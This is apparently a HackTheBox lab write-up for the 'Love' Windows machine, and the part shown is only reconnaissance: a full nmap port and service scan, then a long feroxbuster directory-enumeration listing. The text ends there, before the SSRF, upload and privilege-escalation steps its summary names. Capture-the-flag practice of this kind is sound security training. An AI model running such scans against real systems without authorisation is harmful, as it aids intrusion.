WriteupsHTB — Love
WebEasyWindows
HTB — Love
SSRF on a voting system bypasses firewall to reach internal file analysis service. PHP file upload for RCE, AlwaysInstallElevated for SYSTEM.
January 16, 2025HackTheBox
#SSRF#File Upload#AlwaysInstallElevated#RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.10.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-16 21:44 EST
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 21:45 (0:00:04 remaining)
Nmap scan report for 10.10.10.239
Host is up (0.024s latency).
Not shown: 62874 closed tcp ports (reset), 2642 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| LANDesk-RC:
|_ Host '10.10.14.6' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
| tls-alpn:
|_ http/1.1
|_ssl-date: 2025-01-17T03:10:30+00:00; +23m05s from scanner time.
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=1/16%Time=6789C415%P=x86_64-pc-linux-gnu%r
SF:(LANDesk-RC,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.6'\x20is\x20not\
SF:x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=80%CT=1%CU=35530%PV=Y%DS=2%DC=T%G=Y%TM=6789
OS:C4BE%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=107%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M53CNW8NNS
OS:%O2=M53CNW8NNS%O3=M53CNW8%O4=M53CNW8NNS%O5=M53CNW8NNS%O6=M53CNNS)WIN(W1=
OS:FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=
OS:M53CNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-17T03:10:20
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-01-16T19:10:19-08:00
|_clock-skew: mean: 2h23m05s, deviation: 4h00m02s, median: 23m04s
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 23.96 ms 10.10.14.1
2 24.03 ms 10.10.10.239
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.65 seconds
80/tcp open http
sh
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27dir search
sh
feroxbuster --url http://10.10.10.239
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.239
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 33w 299c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 30w 302c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 30w 338c http://10.10.10.239/images => http://10.10.10.239/images/
301 GET 9l 30w 337c http://10.10.10.239/admin => http://10.10.10.239/admin/
301 GET 9l 30w 340c http://10.10.10.239/includes => http://10.10.10.239/includes/
301 GET 9l 30w 339c http://10.10.10.239/plugins => http://10.10.10.239/plugins/
200 GET 16l 58w 4724c http://10.10.10.239/bower_components/jquery-slimscroll/jquery.slimscroll.min.js
200 GET 61l 106w 1568c http://10.10.10.239/plugins/iCheck/all.css
200 GET 8l 42w 1966c http://10.10.10.239/bower_components/datatables.net-bs/js/dataTables.bootstrap.min.js
200 GET 10l 80w 4516c http://10.10.10.239/plugins/iCheck/icheck.min.js
200 GET 14l 231w 14422c http://10.10.10.239/dist/js/adminlte.min.js
200 GET 4l 66w 31000c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.min.css
200 GET 1l 1474w 41583c http://10.10.10.239/dist/css/skins/_all-skins.min.css
200 GET 164l 1143w 81906c http://10.10.10.239/bower_components/datatables.net/js/jquery.dataTables.min.js
200 GET 7l 1948w 106344c http://10.10.10.239/dist/css/AdminLTE.min.css
200 GET 476l 1907w 11197c http://10.10.10.239/bower_components/jquery/dist/core.js
200 GET 4l 1298w 86659c http://10.10.10.239/bower_components/jquery/dist/jquery.min.js
200 GET 12l 15w 174c http://10.10.10.239/bower_components/fastclick/bower.json
200 GET 22l 169w 1068c http://10.10.10.239/bower_components/fastclick/LICENSE
200 GET 841l 3207w 25965c http://10.10.10.239/bower_components/fastclick/lib/fastclick.js
200 GET 7l 12w 21778c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.css.map
301 GET 9l 30w 337c http://10.10.10.239/Admin => http://10.10.10.239/Admin/
200 GET 2337l 3940w 37414c http://10.10.10.239/bower_components/font-awesome/css/font-awesome.css
200 GET 36l 53w 692c http://10.10.10.239/bower_components/datatables.net/bower.json
200 GET 20l 169w 1096c http://10.10.10.239/bower_components/datatables.net/License.txt
200 GET 10253l 40950w 268039c http://10.10.10.239/bower_components/jquery/dist/jquery.js
200 GET 349l 1562w 17298c http://10.10.10.239/dist/js/demo.js
200 GET 16l 96w 7493c http://10.10.10.239/dist/img/user6-128x128.jpg
200 GET 3l 4w 351c http://10.10.10.239/dist/img/default-50x50.gif
200 GET 22l 148w 14679c http://10.10.10.239/dist/img/avatar.png
200 GET 28l 149w 15048c http://10.10.10.239/dist/img/avatar2.png
200 GET 210l 745w 6064c http://10.10.10.239/dist/js/pages/dashboard.js
200 GET 20l 169w 1096c http://10.10.10.239/bower_components/datatables.net-bs/License.txt
200 GET 15l 108w 7429c http://10.10.10.239/images/facebook-profile-image.jpeg
200 GET 14l 29w 1199c http://10.10.10.239/images/index.jpeg
200 GET 184l 456w 4791c http://10.10.10.239/bower_components/datatables.net-bs/css/dataTables.bootstrap.css
200 GET 1l 112w 4188c http://10.10.10.239/bower_components/datatables.net-bs/css/dataTables.bootstrap.min.css
200 GET 15242l 64948w 445792c http://10.10.10.239/bower_components/datatables.net/js/jquery.dataTables.js
200 GET 1127l 2737w 27831c http://10.10.10.239/dist/js/adminlte.js
200 GET 22l 34w 403c http://10.10.10.239/bower_components/font-awesome/bower.json
200 GET 7l 56w 323c http://10.10.10.239/bower_components/font-awesome/HELP-US-OUT.txt
200 GET 301l 922w 11218c http://10.10.10.239/bower_components/jquery/AUTHORS.txt
200 GET 12l 47w 452c http://10.10.10.239/bower_components/font-awesome/less/core.less
200 GET 20l 47w 476c http://10.10.10.239/bower_components/font-awesome/less/stacked.less
200 GET 18l 49w 495c http://10.10.10.239/bower_components/font-awesome/less/font-awesome.less
200 GET 6l 15w 119c http://10.10.10.239/bower_components/font-awesome/less/fixed-width.less
200 GET 14l 19w 190c http://10.10.10.239/bower_components/jquery/bower.json
200 GET 6l 15w 120c http://10.10.10.239/bower_components/font-awesome/scss/_fixed-width.scss
200 GET 34l 67w 713c http://10.10.10.239/bower_components/font-awesome/less/animated.less
200 GET 60l 161w 1637c http://10.10.10.239/bower_components/font-awesome/scss/_mixins.scss
200 GET 19l 44w 378c http://10.10.10.239/bower_components/font-awesome/scss/_list.scss
200 GET 478l 1497w 14161c http://10.10.10.239/plugins/iCheck/icheck.js
200 GET 21l 171w 1085c http://10.10.10.239/bower_components/bootstrap/LICENSE
200 GET 5l 43w 425c http://10.10.10.239/bower_components/bootstrap/CHANGELOG.md
200 GET 43l 96w 903c http://10.10.10.239/bower_components/bootstrap/Gemfile.lock
200 GET 34l 59w 641c http://10.10.10.239/bower_components/bootstrap/bower.json
200 GET 89l 171w 2200c http://10.10.10.239/bower_components/bootstrap/package.json
200 GET 22l 135w 1143c http://10.10.10.239/bower_components/bootstrap/ISSUE_TEMPLATE.md
200 GET 6l 15w 127c http://10.10.10.239/bower_components/bootstrap/Gemfile
200 GET 32l 76w 964c http://10.10.10.239/bower_components/bootstrap/package.js
200 GET 511l 1200w 14386c http://10.10.10.239/bower_components/bootstrap/Gruntfile.js
200 GET 288l 1759w 139600c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.woff2
200 GET 47l 399w 30342c http://10.10.10.239/plugins/iCheck/polaris/polaris@2x.png
200 GET 6l 1429w 121200c http://10.10.10.239/bower_components/bootstrap/dist/css/bootstrap.min.css
302 GET 0l 0w 0c http://10.10.10.239/login.php => index.php
200 GET 28l 72w 1292c http://10.10.10.239/bower_components/bootstrap/nuget/bootstrap.less.nuspec
200 GET 7l 432w 37045c http://10.10.10.239/bower_components/bootstrap/dist/js/bootstrap.min.js
200 GET 62l 136w 1645c http://10.10.10.239/plugins/iCheck/square/purple.css
200 GET 5l 19w 2102c http://10.10.10.239/dist/img/icons.png
200 GET 20l 88w 6046c http://10.10.10.239/dist/img/user4-128x128.jpg
200 GET 7l 53w 4847c http://10.10.10.239/dist/img/user1-128x128.jpg
200 GET 47l 265w 24361c http://10.10.10.239/dist/img/avatar04.png
200 GET 36l 242w 1605c http://10.10.10.239/bower_components/jquery/LICENSE.txt
301 GET 9l 30w 346c http://10.10.10.239/Admin/Includes => http://10.10.10.239/Admin/Includes/
200 GET 85l 241w 2206c http://10.10.10.239/plugins/pace/pace.css
200 GET 282l 740w 8486c http://10.10.10.239/plugins/bootstrap-slider/slider.css
200 GET 121l 293w 2780c http://10.10.10.239/plugins/timepicker/bootstrap-timepicker.css
200 GET 2l 210w 12507c http://10.10.10.239/plugins/pace/pace.min.js
200 GET 40l 76w 826c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-1.2.2.css
200 GET 935l 2880w 26566c http://10.10.10.239/plugins/pace/pace.js
200 GET 3l 47w 2226c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.min.css
200 GET 117l 239w 2553c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.css
200 GET 50l 121w 1576c http://10.10.10.239/plugins/input-mask/jquery.inputmask.phone.extensions.js
200 GET 169l 582w 9392c http://10.10.10.239/plugins/input-mask/jquery.inputmask.regex.extensions.js
200 GET 122l 410w 5315c http://10.10.10.239/plugins/input-mask/jquery.inputmask.extensions.js
200 GET 1452l 5977w 212322c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.ttf
200 GET 78l 191w 2632c http://10.10.10.239/Admin/Includes/scripts.php
200 GET 0l 0w 0c http://10.10.10.239/Admin/Includes/conn.php
200 GET 126l 324w 4388c http://10.10.10.239/
200 GET 1203l 7516w 710884c http://10.10.10.239/dist/img/photo3.jpg
200 GET 27l 140w 11392c http://10.10.10.239/dist/img/user7-128x128.jpg
200 GET 34l 184w 16798c http://10.10.10.239/dist/img/avatar3.png
200 GET 20l 147w 11293c http://10.10.10.239/dist/img/user5-128x128.jpg
200 GET 33l 159w 12210c http://10.10.10.239/dist/img/user2-160x160.jpg
200 GET 20l 93w 8707c http://10.10.10.239/dist/img/user8-128x128.jpg
200 GET 156l 1018w 78571c http://10.10.10.239/dist/img/boxed-bg.png
301 GET 9l 30w 340c http://10.10.10.239/Includes => http://10.10.10.239/Includes/
200 GET 0l 0w 0c http://10.10.10.239/Includes/conn.php
200 GET 9l 21w 305c http://10.10.10.239/Includes/footer.php
200 GET 34l 79w 1168c http://10.10.10.239/Includes/scripts.php
200 GET 8l 46w 471c http://10.10.10.239/bower_components/bootstrap/nuget/MyGet.ps1
301 GET 9l 30w 337c http://10.10.10.239/ADMIN => http://10.10.10.239/ADMIN/
200 GET 182l 598w 4559c http://10.10.10.239/bower_components/datatables.net-bs/js/dataTables.bootstrap.js
200 GET 5l 24w 1938c http://10.10.10.239/dist/img/credit/visa.png
200 GET 1l 25w 12738c http://10.10.10.239/dist/css/alt/AdminLTE-bootstrap-social.min.css
200 GET 1l 128w 3621c http://10.10.10.239/dist/css/skins/skin-red-light.min.css
200 GET 22l 65w 994c http://10.10.10.239/Admin/Includes/votes_modal.php
200 GET 32l 103w 1013c http://10.10.10.239/bower_components/jquery-slimscroll/package.json
200 GET 37l 112w 1459c http://10.10.10.239/Includes/navbar.php
200 GET 6l 82w 5933c http://10.10.10.239/dist/img/user3-128x128.jpg
302 GET 4l 35w 370c http://10.10.10.239/Includes/session.php => index.php
200 GET 212l 476w 5991c http://10.10.10.239/bower_components/bootstrap/js/collapse.js
200 GET 1781l 5532w 48423c http://10.10.10.239/dist/css/skins/_all-skins.css
200 GET 488l 1679w 22814c http://10.10.10.239/plugins/input-mask/jquery.inputmask.date.extensions.js
200 GET 474l 1341w 13832c http://10.10.10.239/bower_components/jquery-slimscroll/jquery.slimscroll.js
200 GET 29l 164w 13759c http://10.10.10.239/dist/img/avatar5.png
200 GET 0l 0w 0c http://10.10.10.239/Includes/slugify.php
200 GET 4l 23w 2173c http://10.10.10.239/dist/img/credit/paypal2.png
200 GET 1l 40w 1863c http://10.10.10.239/plugins/pace/pace.min.css
200 GET 7l 38w 2787c http://10.10.10.239/dist/img/credit/mestro.png
200 GET 237l 667w 6075c http://10.10.10.239/bower_components/bootstrap/grunt/bs-lessdoc-parser.js
200 GET 7l 30w 2816c http://10.10.10.239/dist/img/credit/cirrus.png
200 GET 10l 42w 2822c http://10.10.10.239/dist/img/credit/mastercard.png
200 GET 18l 54w 3671c http://10.10.10.239/dist/img/credit/paypal.png
200 GET 152l 472w 4350c http://10.10.10.239/dist/css/skins/skin-yellow-light.css
200 GET 12l 58w 4319c http://10.10.10.239/dist/img/credit/american-express.png
200 GET 2671l 62869w 444379c http://10.10.10.239/bower_components/font-awesome/fonts/fontawesome-webfont.svg
200 GET 1l 29w 1469c http://10.10.10.239/dist/css/alt/AdminLTE-fullcalendar.min.css
200 GET 34l 78w 764c http://10.10.10.239/bower_components/bootstrap/less/close.less
200 GET 30l 106w 990c http://10.10.10.239/bower_components/bootstrap/grunt/bs-commonjs-generator.js
200 GET 82l 179w 1439c http://10.10.10.239/bower_components/bootstrap/grunt/sauce_browsers.yml
200 GET 57l 168w 2481c http://10.10.10.239/Includes/ballot_modal.php
200 GET 270l 637w 5651c http://10.10.10.239/bower_components/bootstrap/less/carousel.less
200 GET 134l 417w 3560c http://10.10.10.239/dist/css/skins/skin-yellow.css
200 GET 28l 72w 1270c http://10.10.10.239/bower_components/bootstrap/nuget/bootstrap.nuspec
200 GET 60l 231w 2813c http://10.10.10.239/Admin/Includes/navbar.php
200 GET 520l 1733w 16719c http://10.10.10.239/bower_components/bootstrap/js/tooltip.js
200 GET 44l 168w 1349c http://10.10.10.239/bower_components/bootstrap/grunt/bs-raw-files-generator.js
200 GET 155l 317w 3905c http://10.10.10.239/bower_components/bootstrap/js/tab.js
200 GET 64l 115w 1079c http://10.10.10.239/bower_components/bootstrap/less/labels.less
200 GET 165l 419w 4743c http://10.10.10.239/bower_components/bootstrap/js/dropdown.js
200 GET 73l 168w 1518c http://10.10.10.239/bower_components/bootstrap/less/alerts.less
200 GET 66l 147w 1199c http://10.10.10.239/bower_components/bootstrap/less/badges.less
200 GET 54l 95w 861c http://10.10.10.239/bower_components/bootstrap/less/pager.less
200 GET 1l 113w 3010c http://10.10.10.239/dist/css/skins/skin-green.min.css
200 GET 84l 195w 1387c http://10.10.10.239/bower_components/bootstrap/less/grid.less
200 GET 1l 128w 3719c http://10.10.10.239/dist/css/skins/skin-green-light.min.css
200 GET 109l 278w 2909c http://10.10.10.239/bower_components/bootstrap/grunt/change-version.js
200 GET 163l 500w 4533c http://10.10.10.239/dist/css/skins/skin-blue-light.css
200 GET 1l 128w 3768c http://10.10.10.239/dist/css/skins/skin-yellow-light.min.css
200 GET 152l 472w 4350c http://10.10.10.239/dist/css/skins/skin-purple-light.css
200 GET 161l 505w 4171c http://10.10.10.239/dist/css/skins/skin-black.css
200 GET 8l 267w 33323c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-1.2.2.min.js
200 GET 1l 128w 3768c http://10.10.10.239/dist/css/skins/skin-purple-light.min.css
200 GET 1l 47w 2732c http://10.10.10.239/dist/css/alt/AdminLTE-select2.min.css
200 GET 1l 113w 3055c http://10.10.10.239/dist/css/skins/skin-yellow.min.css
200 GET 26l 51w 594c http://10.10.10.239/bower_components/bootstrap/less/breadcrumbs.less
200 GET 100l 215w 3042c http://10.10.10.239/dist/css/alt/AdminLTE-select2.css
200 GET 1l 132w 3513c http://10.10.10.239/dist/css/skins/skin-black.min.css
200 GET 93l 207w 1820c http://10.10.10.239/dist/css/alt/AdminLTE-fullcalendar.css
200 GET 134l 417w 3419c http://10.10.10.239/dist/css/skins/skin-red.css
200 GET 1l 113w 3055c http://10.10.10.239/dist/css/skins/skin-purple.min.css
200 GET 134l 417w 3513c http://10.10.10.239/dist/css/skins/skin-green.css
200 GET 760l 1654w 15719c http://10.10.10.239/dist/css/alt/AdminLTE-bootstrap-social.css
200 GET 13l 1743w 240427c http://10.10.10.239/plugins/jQueryUI/jquery-ui.min.js
200 GET 869l 2256w 27472c http://10.10.10.239/bower_components/bootstrap/less/variables.less
200 GET 1576l 4565w 51062c http://10.10.10.239/plugins/bootstrap-slider/bootstrap-slider.js
301 GET 9l 30w 364c http://10.10.10.239/bower_components/ion.rangeSlider => http://10.10.10.239/bower_components/ion.rangeSlider/
301 GET 9l 30w 358c http://10.10.10.239/bower_components/morris.js => http://10.10.10.239/bower_components/morris.js/
301 GET 9l 30w 357c http://10.10.10.239/bower_components/chart.js => http://10.10.10.239/bower_components/chart.js/
200 GET 7l 1565w 73837c http://10.10.10.239/dist/css/alt/AdminLTE-without-plugins.min.css
200 GET 4002l 10515w 90151c http://10.10.10.239/dist/css/alt/AdminLTE-without-plugins.css
200 GET 2679l 5252w 93626c http://10.10.10.239/bower_components/bootstrap/grunt/npm-shrinkwrap.json
200 GET 1l 2w 104583c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.min.map
200 GET 4l 1058w 69597c http://10.10.10.239/bower_components/jquery/dist/jquery.slim.min.js
200 GET 1l 961w 144313c http://10.10.10.239/plugins/jvectormap/jquery-jvectormap-world-mill-en.js
200 GET 78l 191w 2632c http://10.10.10.239/ADMIN/includes/scripts.php
200 GET 22l 65w 994c http://10.10.10.239/ADMIN/includes/votes_modal.php
200 GET 0l 0w 0c http://10.10.10.239/ADMIN/includes/conn.php
200 GET 6l 15w 230c http://10.10.10.239/ADMIN/includes/footer.php
200 GET 71l 208w 3593c http://10.10.10.239/ADMIN/includes/profile_modal.php
200 GET 100l 251w 4509c http://10.10.10.239/ADMIN/includes/positions_modal.php
200 GET 60l 231w 2813c http://10.10.10.239/ADMIN/includes/navbar.php
200 GET 64l 229w 3310c http://10.10.10.239/ADMIN/includes/menubar.php
200 GET 31l 94w 1551c http://10.10.10.239/ADMIN/includes/config_modal.php
200 GET 152l 472w 4197c http://10.10.10.239/dist/css/skins/skin-red-light.css
200 GET 94l 209w 2284c http://10.10.10.239/bower_components/bootstrap/js/alert.js
200 GET 5673l 14551w 128974c http://10.10.10.239/dist/css/AdminLTE.css
200 GET 1l 7w 131666c http://10.10.10.239/bower_components/jquery/dist/jquery.min.map
200 GET 486l 3203w 220438c http://10.10.10.239/dist/img/boxed-bg.jpg
200 GET 3l 19w 144c http://10.10.10.239/bower_components/jquery-sparkline/minheader.txt
200 GET 426l 1804w 15014c http://10.10.10.239/bower_components/eve-raphael/eve.js
200 GET 66l 165w 1685c http://10.10.10.239/bower_components/eve-raphael/e.html
200 GET 13l 23w 233c http://10.10.10.239/bower_components/eve-raphael/component.json
200 GET 18l 37w 390c http://10.10.10.239/bower_components/eve-raphael/package.json
200 GET 17l 28w 326c http://10.10.10.239/bower_components/eve-raphael/bower.json
200 GET 202l 1580w 11356c http://10.10.10.239/bower_components/eve-raphael/LICENSE
200 GET 17l 27w 338c http://10.10.10.239/bower_components/jquery-sparkline/bower.json
200 GET 41l 73w 1084c http://10.10.10.239/bower_components/jquery-sparkline/Makefile
200 GET 1l 1w 6c http://10.10.10.239/bower_components/jquery-sparkline/version.txt
200 GET 34l 63w 952c http://10.10.10.239/bower_components/jquery-sparkline/sparkline.jquery.json
200 GET 20l 24w 292c http://10.10.10.239/bower_components/mocha/bower.json
200 GET 22l 171w 1103c http://10.10.10.239/bower_components/mocha/LICENSE
200 GET 270l 549w 4242c http://10.10.10.239/bower_components/mocha/mocha.css
200 GET 149l 373w 6830c http://10.10.10.239/ADMIN/includes/voters_modal.php
200 GET 40l 76w 1485c http://10.10.10.239/bower_components/inputmask/bower.json
200 GET 324l 1677w 10311c http://10.10.10.239/bower_components/jquery-sparkline/Changelog.txt
200 GET 71l 149w 1689c http://10.10.10.239/bower_components/jquery-ui/package.json
200 GET 654l 2979w 20415c http://10.10.10.239/bower_components/mocha/History.md
200 GET 14975l 50670w 566620c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.all.js
200 GET 69l 163w 2083c http://10.10.10.239/bower_components/jquery-ui/composer.json
200 GET 284l 883w 10759c http://10.10.10.239/bower_components/jquery-ui/AUTHORS.txt
200 GET 12l 18w 151c http://10.10.10.239/bower_components/jquery-ui/bower.json
200 GET 13l 21w 221c http://10.10.10.239/bower_components/jquery-ui/component.json
200 GET 44l 271w 1827c http://10.10.10.239/bower_components/jquery-ui/LICENSE.txt
200 GET 16617l 60375w 470596c http://10.10.10.239/plugins/jQueryUI/jquery-ui.js
200 GET 22l 169w 1075c http://10.10.10.239/bower_components/moment/LICENSE
200 GET 19l 48w 462c http://10.10.10.239/bower_components/select2/component.json
200 GET 56l 349w 2154c http://10.10.10.239/bower_components/bootstrap-timepicker/CHANGELOG.md
200 GET 20l 165w 1041c http://10.10.10.239/bower_components/bootstrap-timepicker/LICENSE
200 GET 35l 55w 833c http://10.10.10.239/bower_components/bootstrap-timepicker/bower.json
200 GET 20l 167w 1053c http://10.10.10.239/bower_components/fullcalendar/LICENSE.txt
200 GET 127l 612w 4594c http://10.10.10.239/bower_components/fullcalendar/CONTRIBUTING.md
200 GET 41l 71w 852c http://10.10.10.239/bower_components/fullcalendar/bower.json
200 GET 8l 2944w 210932c http://10.10.10.239/plugins/bootstrap-wysihtml5/bootstrap3-wysihtml5.all.min.js
200 GET 1433l 8653w 763662c http://10.10.10.239/dist/img/photo2.png
200 GET 25l 29w 422c http://10.10.10.239/bower_components/moment/bower.json
200 GET 13l 39w 384c http://10.10.10.239/bower_components/select2/bower.json
200 GET 25l 45w 522c http://10.10.10.239/bower_components/select2/composer.json
200 GET 73l 143w 1758c http://10.10.10.239/bower_components/select2/package.json
200 GET 369l 787w 13199c http://10.10.10.239/bower_components/bootstrap-daterangepicker/demo.html
200 GET 712l 2073w 20497c http://10.10.10.239/bower_components/moment/moment.d.ts
200 GET 21l 176w 1124c http://10.10.10.239/bower_components/select2/LICENSE.md
200 GET 254l 1836w 20532c http://10.10.10.239/bower_components/select2/CHANGELOG.md
301 GET 9l 30w 363c http://10.10.10.239/bower_components/jquery-knob/js => http://10.10.10.239/bower_components/jquery-knob/js/
200 GET 22l 35w 431c http://10.10.10.239/bower_components/bootstrap-slider/bower.json
200 GET 32l 69w 873c http://10.10.10.239/bower_components/select2/select2.jquery.json
200 GET 86l 148w 2019c http://10.10.10.239/bower_components/PACE/install.json
200 GET 35l 52w 653c http://10.10.10.239/bower_components/PACE/bower.json
200 GET 43l 207w 15077c http://10.10.10.239/bower_components/bootstrap-slider/locks.png
200 GET 140l 145w 306319c http://10.10.10.239/dist/css/adminlte.min.css.map
200 GET 178l 470w 4787c http://10.10.10.239/bower_components/bootstrap-slider/slider.css
200 GET 11l 19w 154c http://10.10.10.239/bower_components/Flot/package.json
200 GET 427l 1080w 12038c http://10.10.10.239/bower_components/bootstrap-slider/bootstrap-slider.js
200 GET 12l 35w 285c http://10.10.10.239/bower_components/Flot/Makefile
200 GET 180l 582w 6151c http://10.10.10.239/bower_components/Flot/jquery.colorhelpers.js
200 GET 27l 74w 837c http://10.10.10.239/bower_components/Flot/flot.jquery.json
200 GET 820l 3071w 23809c http://10.10.10.239/bower_components/Flot/jquery.flot.pie.js
200 GET 75l 566w 3237c http://10.10.10.239/bower_components/Flot/FAQ.md
200 GET 22l 169w 1069c http://10.10.10.239/bower_components/Flot/LICENSE.txt
200 GET 176l 569w 5419c http://10.10.10.239/bower_components/Flot/jquery.flot.crosshair.js
200 GET 432l 1649w 11768c http://10.10.10.239/bower_components/Flot/jquery.flot.time.js
200 GET 8l 14w 114c http://10.10.10.239/bower_components/Flot/component.json
200 GET 71l 330w 2505c http://10.10.10.239/bower_components/Flot/jquery.flot.symbol.js
200 GET 241l 941w 7360c http://10.10.10.239/bower_components/Flot/jquery.flot.image.js
200 GET 143l 685w 4340c http://10.10.10.239/bower_components/Flot/PLUGINS.md
200 GET 190l 683w 6033c http://10.10.10.239/bower_components/Flot/jquery.flot.categories.js
200 GET 59l 204w 3314c http://10.10.10.239/bower_components/Flot/jquery.flot.resize.js
200 GET 346l 1328w 14216c http://10.10.10.239/bower_components/Flot/jquery.flot.navigate.js
200 GET 360l 1427w 13141c http://10.10.10.239/bower_components/Flot/jquery.flot.selection.js
